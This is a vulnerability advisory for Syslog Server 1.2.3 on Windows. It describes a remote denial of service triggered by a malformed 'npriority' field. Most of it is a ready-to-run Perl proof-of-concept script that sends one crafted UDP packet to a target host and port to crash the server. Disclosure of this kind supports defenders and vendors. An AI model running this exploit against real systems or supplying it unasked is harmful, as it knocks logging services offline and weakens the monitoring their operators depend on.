Syslog Server 1.2.3 Denial Of Service

`Title: Syslog Server "npriority" field remote Denial of Service vulnerability  
Software : Syslog Server  
  
Software Version : Syslog Server 1.2.3  
  
Vendor: https://sourceforge.net/p/syslog-server/  
  
Vulnerability Published : 2016-07-02  
  
Vulnerability Update Time :  
  
Status :   
  
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)  
  
Bug Description :  
Syslog Server 1.2.3 is a free syslog server for Windows systems.  
The syslog server cannot handle the content of the npriority field well, whereupon the server may be collapsed by receiving a customized packet.  
  
Proof Of Concept :  
-----------------------------------------------------------  
#!/usr/bin/perl -w  
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)  
use IO::Socket;  
use POSIX qw(strftime);  
$|=1;  
  
$host=shift;  
$port=shift;  
  
die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));  
  
$npriority = '<A>';  
$ndate = strftime "%b%e %H:%M:%S", localtime;  
$nhostname = "10.0.0.2";  
$npid = 'fuzzer[10]';  
$nmsg = "Syslog Fuzzer v2";  
  
$header = $ndate.' '.$nhostname.' '.$npid;  
$packet = $npriority.$header.': '.$nmsg;  
  
$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);  
$con->send($packet);  
print "Done!\n";  
$con->close;  
  
exit(0);  
-----------------------------------------------------------  
  
Credits : This vulnerability was discovered by ChaoYi.Huang_at_connect.polyu.hk  
mail: ChaoYi(dot)Huang(at)connect(dot)polyu(dot)hk / demonalex(at)163(dot)com / chaoyi(dot)huang(at)ccbny(dot)com  
Pentester/Independent Researcher  
`